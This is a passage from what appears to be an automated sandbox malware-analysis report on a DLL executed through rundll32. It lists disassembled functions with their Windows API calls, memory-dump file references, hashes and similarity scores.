                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1532457625-0
                                                                                                                    • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                    • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                    • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                    • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                      • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                    • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                    • _strtol.LIBCMT ref: 10022CB5
                                                                                                                    • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                      • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4211061542-0
                                                                                                                    • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                    • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                    • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                    • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ArrayDestroyFreeSafeTask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253174383-0
                                                                                                                    • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                    • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                    • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                    • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2161412305-0
                                                                                                                    • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                    • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                    • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                    • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                      • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                    • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1615547351-0
                                                                                                                    • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                    • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                    • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                    • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                    • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                    • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                    • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                      • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                    • __strdup.LIBCMT ref: 1001514C
                                                                                                                    • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4206445780-0
                                                                                                                    • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                    • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                    • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                    • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                    • _swprintf.LIBCMT ref: 10017768
                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210924919-0
                                                                                                                    • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                    • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                    • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                    • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1078018258-0
                                                                                                                    • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                    • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                    • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                    • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3354205298-0
                                                                                                                    • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                    • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                    • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                    • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                    • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                    • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3704204646-0
                                                                                                                    • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                    • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                    • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                    • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetFocus.USER32 ref: 10015607
                                                                                                                    • GetParent.USER32(?), ref: 10015615
                                                                                                                    • SendMessageA.USER32 ref: 10015628
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4211600527-0
                                                                                                                    • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                    • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                    • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                    • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2353593579-0
                                                                                                                    • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                    • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                    • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                    • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                      • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                    • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 369458955-0
                                                                                                                    • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                    • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                    • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                    • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
